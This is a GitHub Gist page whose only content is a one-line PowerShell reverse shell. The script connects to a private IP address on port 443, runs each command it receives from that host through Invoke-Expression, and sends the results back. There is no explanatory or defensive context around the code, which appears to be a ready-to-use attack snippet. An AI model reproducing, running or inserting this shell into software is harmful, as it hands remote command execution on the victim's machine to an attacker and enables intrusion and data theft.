Skip to content

Instantly share code, notes, and snippets.

@reanimat0r
Created October 13, 2020 13:58
Show Gist options
  • Save reanimat0r/d5e3068a187237c7d6556916a631af03 to your computer and use it in GitHub Desktop.
Save reanimat0r/d5e3068a187237c7d6556916a631af03 to your computer and use it in GitHub Desktop.
$sm=(New-Object Net.Sockets.TCPClient('172.16.217.130',443)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment